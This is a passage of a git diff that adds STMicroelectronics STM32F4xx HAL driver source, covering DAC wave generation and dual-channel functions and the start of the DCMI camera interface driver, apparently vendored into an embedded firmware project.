(DAC_CHANNEL_2 & 0x10UL))) + { + tmp_swtrig |= DAC_SWTRIGR_SWTRIG2; + } + /* Enable the selected DAC software conversion*/ + SET_BIT(hdac->Instance->SWTRIGR, tmp_swtrig); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdac); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disables DAC and stop conversion of both channels. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DACEx_DualStop(DAC_HandleTypeDef *hdac) +{ + + /* Disable the Peripheral */ + __HAL_DAC_DISABLE(hdac, DAC_CHANNEL_1); + __HAL_DAC_DISABLE(hdac, DAC_CHANNEL_2); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Return function status */ + return HAL_OK; +} +#endif /* DAC_CHANNEL2_SUPPORT */ + +/** + * @brief Enable or disable the selected DAC channel wave generation. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @param Amplitude Select max triangle amplitude. + * This parameter can be one of the following values: + * @arg DAC_TRIANGLEAMPLITUDE_1: Select max triangle amplitude of 1 + * @arg DAC_TRIANGLEAMPLITUDE_3: Select max triangle amplitude of 3 + * @arg DAC_TRIANGLEAMPLITUDE_7: Select max triangle amplitude of 7 + * @arg DAC_TRIANGLEAMPLITUDE_15: Select max triangle amplitude of 15 + * @arg DAC_TRIANGLEAMPLITUDE_31: Select max triangle amplitude of 31 + * @arg DAC_TRIANGLEAMPLITUDE_63: Select max triangle amplitude of 63 + * @arg DAC_TRIANGLEAMPLITUDE_127: Select max triangle amplitude of 127 + * @arg DAC_TRIANGLEAMPLITUDE_255: Select max triangle amplitude of 255 + * @arg DAC_TRIANGLEAMPLITUDE_511: Select max triangle amplitude of 511 + * @arg DAC_TRIANGLEAMPLITUDE_1023: Select max triangle amplitude of 1023 + * @arg DAC_TRIANGLEAMPLITUDE_2047: Select max triangle amplitude of 2047 + * @arg DAC_TRIANGLEAMPLITUDE_4095: Select max triangle amplitude of 4095 + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DACEx_TriangleWaveGenerate(DAC_HandleTypeDef *hdac, uint32_t Channel, uint32_t Amplitude) +{ + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + assert_param(IS_DAC_LFSR_UNMASK_TRIANGLE_AMPLITUDE(Amplitude)); + + /* Process locked */ + __HAL_LOCK(hdac); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + + /* Enable the triangle wave generation for the selected DAC channel */ + MODIFY_REG(hdac->Instance->CR, ((DAC_CR_WAVE1) | (DAC_CR_MAMP1)) << (Channel & 0x10UL), + (DAC_CR_WAVE1_1 | Amplitude) << (Channel & 0x10UL)); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdac); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Enable or disable the selected DAC channel wave generation. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Channel The selected DAC channel. + * This parameter can be one of the following values: + * @arg DAC_CHANNEL_1: DAC Channel1 selected + * @arg DAC_CHANNEL_2: DAC Channel2 selected + * @param Amplitude Unmask DAC channel LFSR for noise wave generation. + * This parameter can be one of the following values: + * @arg DAC_LFSRUNMASK_BIT0: Unmask DAC channel LFSR bit0 for noise wave generation + * @arg DAC_LFSRUNMASK_BITS1_0: Unmask DAC channel LFSR bit[1:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS2_0: Unmask DAC channel LFSR bit[2:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS3_0: Unmask DAC channel LFSR bit[3:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS4_0: Unmask DAC channel LFSR bit[4:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS5_0: Unmask DAC channel LFSR bit[5:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS6_0: Unmask DAC channel LFSR bit[6:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS7_0: Unmask DAC channel LFSR bit[7:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS8_0: Unmask DAC channel LFSR bit[8:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS9_0: Unmask DAC channel LFSR bit[9:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS10_0: Unmask DAC channel LFSR bit[10:0] for noise wave generation + * @arg DAC_LFSRUNMASK_BITS11_0: Unmask DAC channel LFSR bit[11:0] for noise wave generation + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DACEx_NoiseWaveGenerate(DAC_HandleTypeDef *hdac, uint32_t Channel, uint32_t Amplitude) +{ + /* Check the parameters */ + assert_param(IS_DAC_CHANNEL(Channel)); + assert_param(IS_DAC_LFSR_UNMASK_TRIANGLE_AMPLITUDE(Amplitude)); + + /* Process locked */ + __HAL_LOCK(hdac); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_BUSY; + + /* Enable the noise wave generation for the selected DAC channel */ + MODIFY_REG(hdac->Instance->CR, ((DAC_CR_WAVE1) | (DAC_CR_MAMP1)) << (Channel & 0x10UL), + (DAC_CR_WAVE1_0 | Amplitude) << (Channel & 0x10UL)); + + /* Change DAC state */ + hdac->State = HAL_DAC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdac); + + /* Return function status */ + return HAL_OK; +} + +#if defined(DAC_CHANNEL2_SUPPORT) +/** + * @brief Set the specified data holding register value for dual DAC channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @param Alignment Specifies the data alignment for dual channel DAC. + * This parameter can be one of the following values: + * DAC_ALIGN_8B_R: 8bit right data alignment selected + * DAC_ALIGN_12B_L: 12bit left data alignment selected + * DAC_ALIGN_12B_R: 12bit right data alignment selected + * @param Data1 Data for DAC Channel1 to be loaded in the selected data holding register. + * @param Data2 Data for DAC Channel2 to be loaded in the selected data holding register. + * @note In dual mode, a unique register access is required to write in both + * DAC channels at the same time. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DACEx_DualSetValue(DAC_HandleTypeDef *hdac, uint32_t Alignment, uint32_t Data1, uint32_t Data2) +{ + uint32_t data; + uint32_t tmp; + + /* Check the parameters */ + assert_param(IS_DAC_ALIGN(Alignment)); + assert_param(IS_DAC_DATA(Data1)); + assert_param(IS_DAC_DATA(Data2)); + + /* Calculate and set dual DAC data holding register value */ + if (Alignment == DAC_ALIGN_8B_R) + { + data = ((uint32_t)Data2 << 8U) | Data1; + } + else + { + data = ((uint32_t)Data2 << 16U) | Data1; + } + + tmp = (uint32_t)hdac->Instance; + tmp += DAC_DHR12RD_ALIGNMENT(Alignment); + + /* Set the dual DAC selected data holding register */ + *(__IO uint32_t *)tmp = data; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Conversion complete callback in non-blocking mode for Channel2. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DACEx_ConvCpltCallbackCh2(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DACEx_ConvCpltCallbackCh2 could be implemented in the user file + */ +} + +/** + * @brief Conversion half DMA transfer callback in non-blocking mode for Channel2. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DACEx_ConvHalfCpltCallbackCh2(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DACEx_ConvHalfCpltCallbackCh2 could be implemented in the user file + */ +} + +/** + * @brief Error DAC callback for Channel2. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DACEx_ErrorCallbackCh2(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DACEx_ErrorCallbackCh2 could be implemented in the user file + */ +} + +/** + * @brief DMA underrun DAC callback for Channel2. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval None + */ +__weak void HAL_DACEx_DMAUnderrunCallbackCh2(DAC_HandleTypeDef *hdac) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdac); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DACEx_DMAUnderrunCallbackCh2 could be implemented in the user file + */ +} +#endif /* DAC_CHANNEL2_SUPPORT */ + + +/** + * @} + */ + +/** @defgroup DACEx_Exported_Functions_Group3 Peripheral Control functions + * @brief Extended Peripheral Control functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Set the specified data holding register value for DAC channel. + +@endverbatim + * @{ + */ + +#if defined(DAC_CHANNEL2_SUPPORT) +/** + * @brief Return the last data output value of the selected DAC channel. + * @param hdac pointer to a DAC_HandleTypeDef structure that contains + * the configuration information for the specified DAC. + * @retval The selected DAC channel data output value. + */ +uint32_t HAL_DACEx_DualGetValue(DAC_HandleTypeDef *hdac) +{ + uint32_t tmp = 0UL; + + tmp |= hdac->Instance->DOR1; + + tmp |= hdac->Instance->DOR2 << 16UL; + + /* Returns the DAC channel data output register value */ + return tmp; +} +#endif /* DAC_CHANNEL2_SUPPORT */ + +/** + * @} + */ +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/** @defgroup DACEx_Private_Functions DACEx private functions + * @brief Extended private functions + * @{ + */ + +#if defined(DAC_CHANNEL2_SUPPORT) +/** + * @brief DMA conversion complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +void DAC_DMAConvCpltCh2(DMA_HandleTypeDef *hdma) +{ + DAC_HandleTypeDef *hdac = (DAC_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->ConvCpltCallbackCh2(hdac); +#else + HAL_DACEx_ConvCpltCallbackCh2(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + + hdac->State = HAL_DAC_STATE_READY; +} + +/** + * @brief DMA half transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +void DAC_DMAHalfConvCpltCh2(DMA_HandleTypeDef *hdma) +{ + DAC_HandleTypeDef *hdac = (DAC_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* Conversion complete callback */ +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->ConvHalfCpltCallbackCh2(hdac); +#else + HAL_DACEx_ConvHalfCpltCallbackCh2(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA error callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +void DAC_DMAErrorCh2(DMA_HandleTypeDef *hdma) +{ + DAC_HandleTypeDef *hdac = (DAC_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Set DAC error code to DMA error */ + hdac->ErrorCode |= HAL_DAC_ERROR_DMA; + +#if (USE_HAL_DAC_REGISTER_CALLBACKS == 1) + hdac->ErrorCallbackCh2(hdac); +#else + HAL_DACEx_ErrorCallbackCh2(hdac); +#endif /* USE_HAL_DAC_REGISTER_CALLBACKS */ + + hdac->State = HAL_DAC_STATE_READY; +} +#endif /* DAC_CHANNEL2_SUPPORT */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* DAC */ + +#endif /* HAL_DAC_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dcmi.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dcmi.c new file mode 100644 index 000000000..aa237c684 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dcmi.c @@ -0,0 +1,1164 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dcmi.c + * @author MCD Application Team + * @brief DCMI HAL module driver + * This file provides firmware functions to manage the following + * functionalities of the Digital Camera Interface (DCMI) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Error functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The sequence below describes how to use this driver to capture image + from a camera module connected to the DCMI Interface. + This sequence does not take into account the configuration of the + camera module, which should be made before to configure and enable + the DCMI to capture images. + + (#) Program the required configuration through following parameters: + horizontal and vertical polarity, pixel clock polarity, Capture Rate, + Synchronization Mode, code of the frame delimiter and data width + using HAL_DCMI_Init() function. + + (#) Configure the DMA2_Stream1 channel1 to transfer Data from DCMI DR + register to the destination memory buffer. + + (#) Program the required configuration through following parameters: + DCMI mode, destination memory Buffer address and the data length + and enable capture using HAL_DCMI_Start_DMA() function. + + (#) Optionally, configure and Enable the CROP feature to select a rectangular + window from the received image using HAL_DCMI_ConfigCrop() + and HAL_DCMI_EnableCROP() functions + + (#) The capture can be stopped using HAL_DCMI_Stop() function. + + (#) To control DCMI state you can use the function HAL_DCMI_GetState(). + + *** DCMI HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in DCMI HAL driver. + + (+) __HAL_DCMI_ENABLE: Enable the DCMI peripheral. + (+) __HAL_DCMI_DISABLE: Disable the DCMI peripheral. + (+) __HAL_DCMI_GET_FLAG: Get the DCMI pending flags. + (+) __HAL_DCMI_CLEAR_FLAG: Clear the DCMI pending flags. + (+) __HAL_DCMI_ENABLE_IT: Enable the specified DCMI interrupts. + (+) __HAL_DCMI_DISABLE_IT: Disable the specified DCMI interrupts. + (+) __HAL_DCMI_GET_IT_SOURCE: Check whether the specified DCMI interrupt has occurred or not. + + [..] + (@) You can refer to the DCMI HAL driver header file for more useful macros + + *** Callback registration *** + ============================= + + The compilation define USE_HAL_DCMI_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use functions HAL_DCMI_RegisterCallback() to register a user callback. + + Function HAL_DCMI_RegisterCallback() allows to register following callbacks: + (+) FrameEventCallback : DCMI Frame Event. + (+) VsyncEventCallback : DCMI Vsync Event. + (+) LineEventCallback : DCMI Line Event. + (+) ErrorCallback : DCMI error. + (+) MspInitCallback : DCMI MspInit. + (+) MspDeInitCallback : DCMI MspDeInit. + This function takes as parameters the HAL peripheral handle, the callback ID + and a pointer to the user callback function. + + Use function HAL_DCMI_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_DCMI_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the callback ID. + This function allows to reset following callbacks: + (+) FrameEventCallback : DCMI Frame Event. + (+) VsyncEventCallback : DCMI Vsync Event. + (+) LineEventCallback : DCMI Line Event. + (+) ErrorCallback : DCMI error. + (+) MspInitCallback : DCMI MspInit. + (+) MspDeInitCallback : DCMI MspDeInit. + + By default, after the HAL_DCMI_Init and if the state is HAL_DCMI_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions: + examples FrameEventCallback(), HAL_DCMI_ErrorCallback(). + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_DCMI_Init + and HAL_DCMI_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_DCMI_Init and HAL_DCMI_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_DCMI_RegisterCallback before calling HAL_DCMI_DeInit + or HAL_DCMI_Init function. + + When the compilation define USE_HAL_DCMI_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ +/** @defgroup DCMI DCMI + * @brief DCMI HAL module driver + * @{ + */ + +#ifdef HAL_DCMI_MODULE_ENABLED + +#if defined(STM32F407xx) || defined(STM32F417xx) || defined(STM32F427xx) || defined(STM32F437xx) ||\ + defined(STM32F429xx) || defined(STM32F439xx) || defined(STM32F446xx) || defined(STM32F469xx) ||\ + defined(STM32F479xx) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +#define HAL_TIMEOUT_DCMI_STOP 14U /* Set timeout to 1s */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +static void DCMI_DMAXferCplt(DMA_HandleTypeDef *hdma); +static void DCMI_DMAError(DMA_HandleTypeDef *hdma); + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup DCMI_Exported_Functions DCMI Exported Functions + * @{ + */ + +/** @defgroup DCMI_Exported_Functions_Group1 Initialization and Configuration functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the DCMI + (+) De-initialize the DCMI + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the DCMI according to the specified + * parameters in the DCMI_InitTypeDef and create the associated handle. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +__weak HAL_StatusTypeDef HAL_DCMI_Init(DCMI_HandleTypeDef *hdcmi) +{ + /* Check the DCMI peripheral state */ + if(hdcmi == NULL) + { + return HAL_ERROR; + } + + /* Check function parameters */ + assert_param(IS_DCMI_ALL_INSTANCE(hdcmi->Instance)); + assert_param(IS_DCMI_PCKPOLARITY(hdcmi->Init.PCKPolarity)); + assert_param(IS_DCMI_VSPOLARITY(hdcmi->Init.VSPolarity)); + assert_param(IS_DCMI_HSPOLARITY(hdcmi->Init.HSPolarity)); + assert_param(IS_DCMI_SYNCHRO(hdcmi->Init.SynchroMode)); + assert_param(IS_DCMI_CAPTURE_RATE(hdcmi->Init.CaptureRate)); + assert_param(IS_DCMI_EXTENDED_DATA(hdcmi->Init.ExtendedDataMode)); + assert_param(IS_DCMI_MODE_JPEG(hdcmi->Init.JPEGMode)); + + if(hdcmi->State == HAL_DCMI_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hdcmi->Lock = HAL_UNLOCKED; + /* Init the low level hardware */ + /* Init the DCMI Callback settings */ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + hdcmi->FrameEventCallback = HAL_DCMI_FrameEventCallback; /* Legacy weak FrameEventCallback */ + hdcmi->VsyncEventCallback = HAL_DCMI_VsyncEventCallback; /* Legacy weak VsyncEventCallback */ + hdcmi->LineEventCallback = HAL_DCMI_LineEventCallback; /* Legacy weak LineEventCallback */ + hdcmi->ErrorCallback = HAL_DCMI_ErrorCallback; /* Legacy weak ErrorCallback */ + + if(hdcmi->MspInitCallback == NULL) + { + /* Legacy weak MspInit Callback */ + hdcmi->MspInitCallback = HAL_DCMI_MspInit; + } + /* Initialize the low level hardware (MSP) */ + hdcmi->MspInitCallback(hdcmi); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_DCMI_MspInit(hdcmi); +#endif /* (USE_HAL_DCMI_REGISTER_CALLBACKS) */ + HAL_DCMI_MspInit(hdcmi); + } + + /* Change the DCMI state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Set DCMI parameters */ + /* Configures the HS, VS, DE and PC polarity */ + hdcmi->Instance->CR &= ~(DCMI_CR_PCKPOL | DCMI_CR_HSPOL | DCMI_CR_VSPOL | DCMI_CR_EDM_0 | + DCMI_CR_EDM_1 | DCMI_CR_FCRC_0 | DCMI_CR_FCRC_1 | DCMI_CR_JPEG | + DCMI_CR_ESS); + hdcmi->Instance->CR |= (uint32_t)(hdcmi->Init.SynchroMode | hdcmi->Init.CaptureRate | \ + hdcmi->Init.VSPolarity | hdcmi->Init.HSPolarity | \ + hdcmi->Init.PCKPolarity | hdcmi->Init.ExtendedDataMode | \ + hdcmi->Init.JPEGMode); + + if(hdcmi->Init.SynchroMode == DCMI_SYNCHRO_EMBEDDED) + { + hdcmi->Instance->ESCR = (((uint32_t)hdcmi->Init.SyncroCode.FrameStartCode) | + ((uint32_t)hdcmi->Init.SyncroCode.LineStartCode << DCMI_POSITION_ESCR_LSC)| + ((uint32_t)hdcmi->Init.SyncroCode.LineEndCode << DCMI_POSITION_ESCR_LEC) | + ((uint32_t)hdcmi->Init.SyncroCode.FrameEndCode << DCMI_POSITION_ESCR_FEC)); + } + + /* Enable the Line, Vsync, Error and Overrun interrupts */ + __HAL_DCMI_ENABLE_IT(hdcmi, DCMI_IT_LINE | DCMI_IT_VSYNC | DCMI_IT_ERR | DCMI_IT_OVR); + + /* Update error code */ + hdcmi->ErrorCode = HAL_DCMI_ERROR_NONE; + + /* Initialize the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Deinitializes the DCMI peripheral registers to their default reset + * values. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_DCMI_DeInit(DCMI_HandleTypeDef *hdcmi) +{ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + if(hdcmi->MspDeInitCallback == NULL) + { + hdcmi->MspDeInitCallback = HAL_DCMI_MspDeInit; + } + /* De-Initialize the low level hardware (MSP) */ + hdcmi->MspDeInitCallback(hdcmi); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC and DMA */ + HAL_DCMI_MspDeInit(hdcmi); +#endif /* (USE_HAL_DCMI_REGISTER_CALLBACKS) */ + + /* Update error code */ + hdcmi->ErrorCode = HAL_DCMI_ERROR_NONE; + + /* Initialize the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hdcmi); + + return HAL_OK; +} + +/** + * @brief Initializes the DCMI MSP. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval None + */ +__weak void HAL_DCMI_MspInit(DCMI_HandleTypeDef* hdcmi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdcmi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DCMI_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes the DCMI MSP. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval None + */ +__weak void HAL_DCMI_MspDeInit(DCMI_HandleTypeDef* hdcmi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdcmi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DCMI_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ +/** @defgroup DCMI_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure destination address and data length and + Enables DCMI DMA request and enables DCMI capture + (+) Stop the DCMI capture. + (+) Handles DCMI interrupt request. + +@endverbatim + * @{ + */ + +/** + * @brief Enables DCMI DMA request and enables DCMI capture + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @param DCMI_Mode DCMI capture mode snapshot or continuous grab. + * @param pData The destination memory Buffer address (LCD Frame buffer). + * @param Length The length of capture to be transferred. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_Start_DMA(DCMI_HandleTypeDef* hdcmi, uint32_t DCMI_Mode, uint32_t pData, uint32_t Length) +{ + /* Initialize the second memory address */ + uint32_t SecondMemAddress = 0U; + + /* Check function parameters */ + assert_param(IS_DCMI_CAPTURE_MODE(DCMI_Mode)); + + /* Process Locked */ + __HAL_LOCK(hdcmi); + + /* Lock the DCMI peripheral state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Enable DCMI by setting DCMIEN bit */ + __HAL_DCMI_ENABLE(hdcmi); + + /* Configure the DCMI Mode */ + hdcmi->Instance->CR &= ~(DCMI_CR_CM); + hdcmi->Instance->CR |= (uint32_t)(DCMI_Mode); + + /* Set the DMA memory0 conversion complete callback */ + hdcmi->DMA_Handle->XferCpltCallback = DCMI_DMAXferCplt; + + /* Set the DMA error callback */ + hdcmi->DMA_Handle->XferErrorCallback = DCMI_DMAError; + + /* Set the dma abort callback */ + hdcmi->DMA_Handle->XferAbortCallback = NULL; + + /* Reset transfer counters value */ + hdcmi->XferCount = 0U; + hdcmi->XferTransferNumber = 0U; + + if(Length <= 0xFFFFU) + { + /* Enable the DMA Stream */ + HAL_DMA_Start_IT(hdcmi->DMA_Handle, (uint32_t)&hdcmi->Instance->DR, (uint32_t)pData, Length); + } + else /* DCMI_DOUBLE_BUFFER Mode */ + { + /* Set the DMA memory1 conversion complete callback */ + hdcmi->DMA_Handle->XferM1CpltCallback = DCMI_DMAXferCplt; + + /* Initialize transfer parameters */ + hdcmi->XferCount = 1U; + hdcmi->XferSize = Length; + hdcmi->pBuffPtr = pData; + + /* Get the number of buffer */ + while(hdcmi->XferSize > 0xFFFFU) + { + hdcmi->XferSize = (hdcmi->XferSize/2U); + hdcmi->XferCount = hdcmi->XferCount*2U; + } + + /* Update DCMI counter and transfer number*/ + hdcmi->XferCount = (hdcmi->XferCount - 2U); + hdcmi->XferTransferNumber = hdcmi->XferCount; + + /* Update second memory address */ + SecondMemAddress = (uint32_t)(pData + (4U*hdcmi->XferSize)); + + /* Start DMA multi buffer transfer */ + HAL_DMAEx_MultiBufferStart_IT(hdcmi->DMA_Handle, (uint32_t)&hdcmi->Instance->DR, (uint32_t)pData, SecondMemAddress, hdcmi->XferSize); + } + + /* Enable Capture */ + hdcmi->Instance->CR |= DCMI_CR_CAPTURE; + + /* Release Lock */ + __HAL_UNLOCK(hdcmi); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disable DCMI DMA request and Disable DCMI capture + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_Stop(DCMI_HandleTypeDef* hdcmi) +{ + __IO uint32_t count = SystemCoreClock / HAL_TIMEOUT_DCMI_STOP; + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdcmi); + + /* Lock the DCMI peripheral state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Disable Capture */ + hdcmi->Instance->CR &= ~(DCMI_CR_CAPTURE); + + /* Check if the DCMI capture effectively disabled */ + do + { + if (count-- == 0U) + { + /* Update error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_TIMEOUT; + + status = HAL_TIMEOUT; + break; + } + } + while((hdcmi->Instance->CR & DCMI_CR_CAPTURE) != 0U); + + /* Disable the DCMI */ + __HAL_DCMI_DISABLE(hdcmi); + + /* Disable the DMA */ + HAL_DMA_Abort(hdcmi->DMA_Handle); + + /* Update error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_NONE; + + /* Change DCMI state */ + hdcmi->State = HAL_DCMI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + /* Return function status */ + return status; +} + +/** + * @brief Suspend DCMI capture + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_Suspend(DCMI_HandleTypeDef* hdcmi) +{ + __IO uint32_t count = SystemCoreClock / HAL_TIMEOUT_DCMI_STOP; + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdcmi); + + if(hdcmi->State == HAL_DCMI_STATE_BUSY) + { + /* Change DCMI state */ + hdcmi->State = HAL_DCMI_STATE_SUSPENDED; + + /* Disable Capture */ + hdcmi->Instance->CR &= ~(DCMI_CR_CAPTURE); + + /* Check if the DCMI capture effectively disabled */ + do + { + if (count-- == 0U) + { + /* Update error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_TIMEOUT; + + /* Change DCMI state */ + hdcmi->State = HAL_DCMI_STATE_READY; + + status = HAL_TIMEOUT; + break; + } + } + while((hdcmi->Instance->CR & DCMI_CR_CAPTURE) != 0); + } + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + /* Return function status */ + return status; +} + +/** + * @brief Resume DCMI capture + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +HAL_StatusTypeDef 